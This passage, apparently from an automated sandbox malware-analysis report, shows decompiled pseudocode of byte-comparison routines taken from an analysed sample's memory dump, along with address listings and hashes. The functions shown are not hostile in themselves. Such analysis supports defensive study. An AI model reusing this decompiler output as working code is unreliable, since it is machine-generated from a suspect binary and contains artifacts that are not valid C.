					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L17;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L14;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L12;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t316;
				goto L2;
			}

































                                                                                      0x0040ecec
                                                                                      0x0040ecec
                                                                                      0x0040ecf2
                                                                                      0x0040ed72
                                                                                      0x0040ed74
                                                                                      0x0040ed76
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ed7c
                                                                                      0x0040ed82
                                                                                      0x0040ee01
                                                                                      0x0040ee03
                                                                                      0x0040ee05
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ee0b
                                                                                      0x0040ee11
                                                                                      0x0040ee90
                                                                                      0x0040ee92
                                                                                      0x0040ee94
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ee9a
                                                                                      0x0040eea0
                                                                                      0x0040ef1f
                                                                                      0x0040ef21
                                                                                      0x0040ef23
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ef2f
                                                                                      0x0040efaf
                                                                                      0x0040efb1
                                                                                      0x0040efb3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040efb9
                                                                                      0x0040efbf
                                                                                      0x0040f03e
                                                                                      0x0040f040
                                                                                      0x0040f042
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040f048
                                                                                      0x0040f04e
                                                                                      0x0040f0cd
                                                                                      0x0040f0cf
                                                                                      0x0040f0d1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040f0df
                                                                                      0x0040f0e1
                                                                                      0x0040ecc4
                                                                                      0x0040eccc
                                                                                      0x0040ecce
                                                                                      0x0040e8aa
                                                                                      0x0040e8b2
                                                                                      0x0040e8b4
                                                                                      0x0040e8c5
                                                                                      0x0040e8c5
                                                                                      0x0040e4ba
                                                                                      0x0040f216
                                                                                      0x0040f216
                                                                                      0x0040ecdb
                                                                                      0x0040ece1
                                                                                      0x0040f0fa
                                                                                      0x0040f0fa
                                                                                      0x00000000
                                                                                      0x0040ece7
                                                                                      0x00000000
                                                                                      0x0040ece7
                                                                                      0x0040ece1
                                                                                      0x0040f0ee
                                                                                      0x0040f0f4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040f0f4
                                                                                      0x0040f057
                                                                                      0x0040f059
                                                                                      0x0040f070
                                                                                      0x0040f078
                                                                                      0x0040f07a
                                                                                      0x0040f091
                                                                                      0x0040f099
                                                                                      0x0040f09b
                                                                                      0x0040f0b2
                                                                                      0x0040f0ba
                                                                                      0x0040f0bc
                                                                                      0x0040f0c9
                                                                                      0x0040f0c9
                                                                                      0x00000000
                                                                                      0x0040f0bc
                                                                                      0x0040f0a8
                                                                                      0x0040f0ac
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040f0ac
                                                                                      0x0040f087
                                                                                      0x0040f08b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040f08b
                                                                                      0x0040f066
                                                                                      0x0040f06a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040f06a
                                                                                      0x0040efc8
                                                                                      0x0040efca
                                                                                      0x0040efe1
                                                                                      0x0040efe9
                                                                                      0x0040efeb
                                                                                      0x0040f002
                                                                                      0x0040f00a
                                                                                      0x0040f00c
                                                                                      0x0040f023
                                                                                      0x0040f02b
                                                                                      0x0040f02d
                                                                                      0x0040f03a
                                                                                      0x0040f03a
                                                                                      0x00000000
                                                                                      0x0040f02d
                                                                                      0x0040f019
                                                                                      0x0040f01d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040f01d
                                                                                      0x0040eff8
                                                                                      0x0040effc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040effc
                                                                                      0x0040efd7
                                                                                      0x0040efdb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040efdb
                                                                                      0x0040ef39
                                                                                      0x0040ef3b
                                                                                      0x0040ef52
                                                                                      0x0040ef5a
                                                                                      0x0040ef5c
                                                                                      0x0040ef73
                                                                                      0x0040ef7b
                                                                                      0x0040ef7d
                                                                                      0x0040ef94
                                                                                      0x0040ef9c
                                                                                      0x0040ef9e
                                                                                      0x0040efab
                                                                                      0x0040efab
                                                                                      0x00000000
                                                                                      0x0040ef9e
                                                                                      0x0040ef8a
                                                                                      0x0040ef8e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ef8e
                                                                                      0x0040ef69
                                                                                      0x0040ef6d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ef6d
                                                                                      0x0040ef48
                                                                                      0x0040ef4c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ef4c
                                                                                      0x0040eea9
                                                                                      0x0040eeab
                                                                                      0x0040eec2
                                                                                      0x0040eeca
                                                                                      0x0040eecc
                                                                                      0x0040eee3
                                                                                      0x0040eeeb
                                                                                      0x0040eeed
                                                                                      0x0040ef04
                                                                                      0x0040ef0c
                                                                                      0x0040ef0e
                                                                                      0x0040ef1b
                                                                                      0x0040ef1b
                                                                                      0x00000000
                                                                                      0x0040ef0e
                                                                                      0x0040eefa
                                                                                      0x0040eefe
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040eefe
                                                                                      0x0040eed9
                                                                                      0x0040eedd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040eedd
                                                                                      0x0040eeb8
                                                                                      0x0040eebc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040eebc
                                                                                      0x0040ee1a
                                                                                      0x0040ee1c
                                                                                      0x0040ee33
                                                                                      0x0040ee3b
                                                                                      0x0040ee3d
                                                                                      0x0040ee54
                                                                                      0x0040ee5c
                                                                                      0x0040ee5e
                                                                                      0x0040ee75
                                                                                      0x0040ee7d
                                                                                      0x0040ee7f
                                                                                      0x0040ee8c
                                                                                      0x0040ee8c
                                                                                      0x00000000
                                                                                      0x0040ee7f
                                                                                      0x0040ee6b
                                                                                      0x0040ee6f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ee6f
                                                                                      0x0040ee4a
                                                                                      0x0040ee4e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ee4e
                                                                                      0x0040ee29
                                                                                      0x0040ee2d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ee2d
                                                                                      0x0040ed8b
                                                                                      0x0040ed8d
                                                                                      0x0040eda4
                                                                                      0x0040edac
                                                                                      0x0040edae
                                                                                      0x0040edc5
                                                                                      0x0040edcd
                                                                                      0x0040edcf
                                                                                      0x0040ede6
                                                                                      0x0040edee
                                                                                      0x0040edf0
                                                                                      0x0040edfd
                                                                                      0x0040edfd
                                                                                      0x00000000
                                                                                      0x0040edf0
                                                                                      0x0040eddc
                                                                                      0x0040ede0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ede0
                                                                                      0x0040edbb
                                                                                      0x0040edbf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040edbf
                                                                                      0x0040ed9a
                                                                                      0x0040ed9e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ecf4
                                                                                      0x0040ecf4
                                                                                      0x0040ecf8
                                                                                      0x0040ecfc
                                                                                      0x0040ecfe
                                                                                      0x0040ed15
                                                                                      0x0040ed15
                                                                                      0x0040ed19
                                                                                      0x0040ed1d
                                                                                      0x0040ed1f
                                                                                      0x0040ed36
                                                                                      0x0040ed36
                                                                                      0x0040ed3a
                                                                                      0x0040ed3e
                                                                                      0x0040ed40
                                                                                      0x0040ed57
                                                                                      0x0040ed57
                                                                                      0x0040ed5b
                                                                                      0x0040ed5f
                                                                                      0x0040ed61
                                                                                      0x0040ed67
                                                                                      0x0040ed6a
                                                                                      0x0040ed6e
                                                                                      0x0040ed6e
                                                                                      0x00000000
                                                                                      0x0040ed61
                                                                                      0x0040ed46
                                                                                      0x0040ed49
                                                                                      0x0040ed4d
                                                                                      0x0040ed51
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ed51
                                                                                      0x0040ed25
                                                                                      0x0040ed28
                                                                                      0x0040ed2c
                                                                                      0x0040ed30
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ed30
                                                                                      0x0040ed04
                                                                                      0x0040ed07
                                                                                      0x0040ed0b
                                                                                      0x0040ed0f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ed0f
                                                                                      0x0040e0e5
                                                                                      0x0040e0e5
                                                                                      0x00000000

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                      • Instruction ID: ecb70c4e080cce6510aacec3edd712e438a2925fe18b715587160a08d1fd9b0d
                                                                                      • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                      • Instruction Fuzzy Hash: 61D15C73C0A9B30AC736852E446862BEA626FD174431ECBF29CE43F3C9963B5D2495D4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040E8CC, Relevance: .4, Instructions: 378COMMONCrypto
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040E8CC(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t204;
				signed char _t206;
				signed int _t211;
				signed int _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t335;
				void* _t337;
				void* _t339;
				void* _t342;
				void* _t344;
				void* _t346;
				void* _t349;
				void* _t351;
				void* _t353;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t309 = 0;
					L15:
					if(_t309 != 0) {
						goto L1;
					}
					_t201 =  *(_t191 - 0x1a);
					if(_t201 ==  *(_t195 - 0x1a)) {
						_t309 = 0;
						L26:
						if(_t309 != 0) {
							goto L1;
						}
						_t202 =  *(_t191 - 0x16);
						if(_t202 ==  *(_t195 - 0x16)) {
							_t309 = 0;
							L37:
							if(_t309 != 0) {
								goto L1;
							}
							_t203 =  *(_t191 - 0x12);
							if(_t203 ==  *(_t195 - 0x12)) {
								_t309 = 0;
								L48:
								if(_t309 != 0) {
									goto L1;
								}
								_t204 =  *(_t191 - 0xe);
								if(_t204 ==  *(_t195 - 0xe)) {
									_t309 = 0;
									L59:
									if(_t309 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t309 = 0;
										L70:
										if(_t309 != 0) {
											goto L1;
										}
										_t206 =  *(_t191 - 6);
										if(_t206 ==  *(_t195 - 6)) {
											_t309 = 0;
											L81:
											if(_t309 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t312 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
												}
												goto L3;
											}
											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
											if(_t211 != 0) {
												_t192 = _t211;
												goto L3;
											}
											goto L4;
										}
										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t314 == 0) {
											L74:
											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t316 == 0) {
												L76:
												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t318 == 0) {
													L78:
													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t309 != 0) {
														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
													}
													goto L81;
												}
												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
												if(_t309 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t321 == 0) {
										L63:
										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t323 == 0) {
											L65:
											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t325 == 0) {
												L67:
												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t309 != 0) {
													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
												}
												goto L70;
											}
											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t328 == 0) {
									L52:
									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t330 == 0) {
										L54:
										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t332 == 0) {
											L56:
											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t309 != 0) {
												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
											}
											goto L59;
										}
										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t335 == 0) {
								L41:
								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t337 == 0) {
									L43:
									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t339 == 0) {
										L45:
										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t309 != 0) {
											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
										}
										goto L48;
									}
									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t342 == 0) {
							L30:
							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t344 == 0) {
								L32:
								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t346 == 0) {
									L34:
									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t309 != 0) {
										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
									}
									goto L37;
								}
								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t349 == 0) {
						L19:
						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t351 == 0) {
							L21:
							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t353 == 0) {
								L23:
								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t309 != 0) {
									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								}
								goto L26;
							}
							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
					if(_t309 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L15;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L12;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L10;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t309;
				goto L3;
			}
































                                                                                      0x0040e8cc
                                                                                      0x0040e8cc
                                                                                      0x0040e8d2
                                                                                      0x0040e951
                                                                                      0x0040e953
                                                                                      0x0040e955
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e95b
                                                                                      0x0040e961
                                                                                      0x0040e9e0
                                                                                      0x0040e9e2
                                                                                      0x0040e9e4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e9ea
                                                                                      0x0040e9f0
                                                                                      0x0040ea6f
                                                                                      0x0040ea71
                                                                                      0x0040ea73
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ea79
                                                                                      0x0040ea7f
                                                                                      0x0040eafe
                                                                                      0x0040eb00
                                                                                      0x0040eb02
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040eb08
                                                                                      0x0040eb0e
                                                                                      0x0040eb8d
                                                                                      0x0040eb8f
                                                                                      0x0040eb91
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040eb9d
                                                                                      0x0040ec1d
                                                                                      0x0040ec1f
                                                                                      0x0040ec21
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ec27
                                                                                      0x0040ec2d
                                                                                      0x0040ecac
                                                                                      0x0040ecae
                                                                                      0x0040ecb0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ecbe
                                                                                      0x0040e4b8
                                                                                      0x0040e4ba
                                                                                      0x0040f216
                                                                                      0x0040f216
                                                                                      0x0040eccc
                                                                                      0x0040ecce
                                                                                      0x0040e8aa
                                                                                      0x0040e8b2
                                                                                      0x0040e8b4
                                                                                      0x0040e8c5
                                                                                      0x0040e8c5
                                                                                      0x00000000
                                                                                      0x0040e8b4
                                                                                      0x0040ecdb
                                                                                      0x0040ece1
                                                                                      0x0040f0fa
                                                                                      0x00000000
                                                                                      0x0040f0fa
                                                                                      0x00000000
                                                                                      0x0040ece7
                                                                                      0x0040ec36
                                                                                      0x0040ec38
                                                                                      0x0040ec4f
                                                                                      0x0040ec57
                                                                                      0x0040ec59
                                                                                      0x0040ec70
                                                                                      0x0040ec78
                                                                                      0x0040ec7a
                                                                                      0x0040ec91
                                                                                      0x0040ec99
                                                                                      0x0040ec9b
                                                                                      0x0040eca8
                                                                                      0x0040eca8
                                                                                      0x00000000
                                                                                      0x0040ec9b
                                                                                      0x0040ec87
                                                                                      0x0040ec8b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ec8b
                                                                                      0x0040ec66
                                                                                      0x0040ec6a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ec6a
                                                                                      0x0040ec45
                                                                                      0x0040ec49
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ec49
                                                                                      0x0040eba7
                                                                                      0x0040eba9
                                                                                      0x0040ebc0
                                                                                      0x0040ebc8
                                                                                      0x0040ebca
                                                                                      0x0040ebe1
                                                                                      0x0040ebe9
                                                                                      0x0040ebeb
                                                                                      0x0040ec02
                                                                                      0x0040ec0a
                                                                                      0x0040ec0c
                                                                                      0x0040ec19
                                                                                      0x0040ec19
                                                                                      0x00000000
                                                                                      0x0040ec0c
                                                                                      0x0040ebf8
                                                                                      0x0040ebfc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ebfc
                                                                                      0x0040ebd7
                                                                                      0x0040ebdb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ebdb
                                                                                      0x0040ebb6
                                                                                      0x0040ebba
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ebba
                                                                                      0x0040eb17
                                                                                      0x0040eb19
                                                                                      0x0040eb30
                                                                                      0x0040eb38
                                                                                      0x0040eb3a
                                                                                      0x0040eb51
                                                                                      0x0040eb59
                                                                                      0x0040eb5b
                                                                                      0x0040eb72
                                                                                      0x0040eb7a
                                                                                      0x0040eb7c
                                                                                      0x0040eb89
                                                                                      0x0040eb89
                                                                                      0x00000000
                                                                                      0x0040eb7c
                                                                                      0x0040eb68
                                                                                      0x0040eb6c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040eb6c
                                                                                      0x0040eb47
                                                                                      0x0040eb4b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040eb4b
                                                                                      0x0040eb26
                                                                                      0x0040eb2a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040eb2a
                                                                                      0x0040ea88
                                                                                      0x0040ea8a
                                                                                      0x0040eaa1
                                                                                      0x0040eaa9
                                                                                      0x0040eaab
                                                                                      0x0040eac2
                                                                                      0x0040eaca
                                                                                      0x0040eacc
                                                                                      0x0040eae3
                                                                                      0x0040eaeb
                                                                                      0x0040eaed
                                                                                      0x0040eafa
                                                                                      0x0040eafa
                                                                                      0x00000000
                                                                                      0x0040eaed
                                                                                      0x0040ead9
                                                                                      0x0040eadd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040eadd
                                                                                      0x0040eab8
                                                                                      0x0040eabc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040eabc
                                                                                      0x0040ea97
                                                                                      0x0040ea9b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ea9b
                                                                                      0x0040e9f9
                                                                                      0x0040e9fb
                                                                                      0x0040ea12
                                                                                      0x0040ea1a
                                                                                      0x0040ea1c
                                                                                      0x0040ea33
                                                                                      0x0040ea3b
                                                                                      0x0040ea3d
                                                                                      0x0040ea54
                                                                                      0x0040ea5c
                                                                                      0x0040ea5e
                                                                                      0x0040ea6b
                                                                                      0x0040ea6b
                                                                                      0x00000000
                                                                                      0x0040ea5e
                                                                                      0x0040ea4a
                                                                                      0x0040ea4e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ea4e
                                                                                      0x0040ea29
                                                                                      0x0040ea2d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ea2d
                                                                                      0x0040ea08
                                                                                      0x0040ea0c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ea0c
                                                                                      0x0040e96a
                                                                                      0x0040e96c
                                                                                      0x0040e983
                                                                                      0x0040e98b
                                                                                      0x0040e98d
                                                                                      0x0040e9a4
                                                                                      0x0040e9ac
                                                                                      0x0040e9ae
                                                                                      0x0040e9c5
                                                                                      0x0040e9cd
                                                                                      0x0040e9cf
                                                                                      0x0040e9dc
                                                                                      0x0040e9dc
                                                                                      0x00000000
                                                                                      0x0040e9cf
                                                                                      0x0040e9bb
                                                                                      0x0040e9bf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
